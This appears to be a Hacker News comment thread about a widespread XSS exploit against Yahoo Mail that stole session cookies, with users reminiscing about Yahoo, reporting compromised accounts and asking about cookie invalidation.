Yahoo Mail users hit by widespread XSS exploit

Whenever I hear something negative about Yahoo, I feel really sorry for them. Yahoo used to be a great company a few years back. Their messenger was one of the best products they ever had, their mail used to be REALLY good (in the early days). But soon, they failed to adapt with the market's needs and they are now here where they are. They COULD have been a great company if they had put in as much effort as their competitors had put in, in understanding their market.<p>The best example was about how they failed to respond to Gmail's popularity. Gmail gave almost every single feature away for free, that Yahoo charged (and still charges?) a premium for. For example - Mail forwarding, (POP, IMAP too?) and so on. I personally used to have a .co.uk address with them and eventually moved to Gmail because their ads were into my face, unlike Gmail's, where they are very subtle.<p>Also the UX on most Yahoo's sites are terribly poor. Ever visited their homepage? Looks like a cluttered fish market.

So, why does the browser send yahoo.com cookies to a request to abysswhatever.com when the user clicks on the link in the email?<p>he just created a pretty valid link with no shenanigans... last i checked, a XSS attack was about making a site churn out javascript code when it was not intended to and then you could make a request that passed that domain's cookies to you.

I believe my Yahoo account was hit by this, since my sent mailbox showed messages with links similar to one I accidentally clicked (from a Gmail account!).<p>The comments in this thread suggest that the attackers now have my cookies. What can I do to invalidate old cookies for Yahoo mail?

Exploit in action: <a href="http://www.youtube.com/watch?v=iBXvebXo-F4" rel="nofollow">http://www.youtube.com/watch?v=iBXvebXo-F4</a><p>It is currently being sold for $700 in various semi-public blackhat forums (hence widespread usage).

A little heads up to the Yahoo Security team probably would have been appreciated!

So does YMail have anything to do with this -- if you were logged into Yahoo and visited the bad page then Evil, Inc would still get your Y and T cookies, right?<p>I have received "Check out this cool link" emails from friends who use Yahoo mail, but I assumed that it was just scraping their Yahoo address book...

Would following their advice of changing your password actually help in this situation? While it's a good practice in general, if I'm understanding this right, the attacker never has your password.

I personally witnessed two instances of this attack as early as December 8. I couldn't figure out until now how it was done.

Already, two of my Facebook friends have reported they have been hit with this vulnerability.

People still use Yahoo mail?